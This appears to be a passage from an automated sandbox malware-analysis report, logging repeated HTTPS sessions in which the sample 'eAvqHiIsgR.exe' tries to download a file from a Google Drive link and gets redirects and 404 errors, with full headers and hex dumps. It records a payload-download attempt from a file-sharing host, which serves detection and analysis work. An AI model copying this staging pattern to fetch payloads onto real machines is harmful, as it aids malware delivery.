2024-12-03 16:26:35 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:36 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:36 GMT Content-Security-Policy: script-src 'nonce-RJ_hvRnWK2g0YmNJJ1PXpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC5xDYlQTK7BKyA1lXs-m8AlqWFk7LeiVOfjAc9BrL8Y85GpZOASDEEJN8t_2kivpJOUez9wttJsNw Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:36 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 72 4e 5f 58 59 72 46 77 54 66 51 48 64 36 67 71 6d 44 78 30 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="crN_XYrFwTfQHd6gqmDx0g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49979	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:38 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:39 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:38 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-6qXRuMfTRZXJj8US2aEuaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49980	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:41 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:42 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:41 GMT Content-Security-Policy: script-src 'nonce-L9wWrCcO5xZIkLBXMP801A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 X-GUploader-UploadID: AFiumC79xWUsHjucgOk9UYtEHnk-RcE_R5talxm5kmIUI3Nf1EiFH68-PN-ploq9UEiJ_7unKy2t-kMoxg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:42 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 50 5f 33 62 52 66 4b 4a 76 5f 73 71 34 43 56 6d 58 53 52 75 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZP_3bRfKJv_sq4CVmXSRuQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49981	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:43 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:44 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:44 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-TH2_lrjDcyGSYwrAaoxDCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49982	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:46 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:47 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:47 GMT Content-Security-Policy: script-src 'nonce-HSHo8qZeZwI-myifIfl6-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC73LT_8RIbikhZ7aMiadkkYH_dbkzfuvlksbtgts_h_5wRkMowMV1a1kz-E6f8m-KirCUt8UG8o1w Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:47 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 41 6d 67 72 54 69 6d 6e 53 58 43 73 33 39 66 58 67 64 54 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UAmgrTimnSXCs39fXgdTNQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49983	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:49 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:50 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:50 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-XsBHOkHnv2Qu8Uy64U-i6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49984	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:52 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:53 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:53 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-j7fetvVzqsPu9BS6yq2COg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC6_3xX-Gvc5Btci_WjemGG-N6XqsJTeKUEdMi-CBxaFvhoN_sr15Cp3jiaOs_R-lmgTQHBxrc0dUg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:53 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 31 43 47 46 4e 6b 5a 30 46 57 52 4c 45 38 47 63 45 71 47 41 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="v1CGFNkZ0FWRLE8GcEqGAw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49985	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:55 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:56 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:56 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-0A5KNhajhD-XiNeyDYSxpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49986	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
